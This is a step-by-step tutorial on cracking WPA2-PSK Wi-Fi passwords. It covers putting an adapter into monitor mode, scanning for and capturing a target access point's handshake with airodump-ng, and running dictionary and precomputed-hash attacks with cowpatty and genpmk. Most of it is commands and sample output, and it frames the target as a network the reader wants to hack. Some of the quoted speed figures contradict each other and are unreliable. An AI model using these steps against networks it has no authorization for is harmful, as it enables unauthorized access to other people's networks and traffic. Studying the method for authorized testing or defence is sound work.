How to Speed up the WPA/WPA2 Password Cracking Process using Cowpatty

Requirements:

Kali Linux Operating System.

Handshake File of the Network that You Want to Hack.

Wordlist.

Cowpatty, by Joshua Wright, is a tool that automates offline dictionary attacks for cracking WPA2-PSK passwords. Cowpatty supports using a pre-computed hash file rather than a plain-text word file.

This can speed up the obtaining process of the “lost” WPA/WPA2 key of your access point. Pre-computed hash files are used to accelerate password brute force when cracking WPA.

They do this by eliminating the need to perform the costly transformation of a password into an encryption key.

Cowpatty

To get a brief rundown of the options, type cowpatty in the terminal:

cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack.

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

Kali Linux will provide you with a brief help screen. Cowpatty requires all of the following:

**A word list.

A file where the password hash has been captured.

The SSID of the target AP.
**
Put the Wireless Adapter in Monitor Mode

You need to put the wireless adapter into monitor mode by typing

airmon-ng start wlan0

(assuming your interface name is wlan0).

airmon-ng start wlan0

This command will change your wireless interface name to wlan0mon.

Find The Target

Start scanning nearby wireless routers using your monitor interface:

airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

Capture the Handshake

Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.

airodump-ng — bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon

This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.

CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet

BSSID STATION PWR Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1

If someone connects to the AP, I will capture the hash and airodump-ng will show me it has been captured in the upper right-hand corner (WPA handshake: 28:EF:01:35:34:85).

Run Cowpatty

Now that I have the hash of the password, I can use it with cowpatty and the wordlist to crack the hash.

cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: angelgirl
key no. 2000: missouri
key no. 3000: birdsong

The PSK is "justletmein".

2000 passphrases tested in 294.42 seconds: 50000.00 passphrases/second

Cowpatty is generating a hash of every word on the wordlist with the SSID as a seed and compares it to the captured hash. When the hashes match, it displays the password of the AP. This process is very CPU intensive and slow.

Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password much faster.

You can generate your own hashes for the target SSID using a tool called genpmk.

genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow

2641 passphrases tested in 4.60 seconds: 451.00 passphrases/second

Once you have generated the hash for the particular SSID, you can then crack the password with cowpatty by typing:

cowpatty -d hash -r handshake-01.cap -s SkyNet

-d argument is for pre-calculated pmk hash name,

-r is for capture handshake file.

-s is for ESSID network name.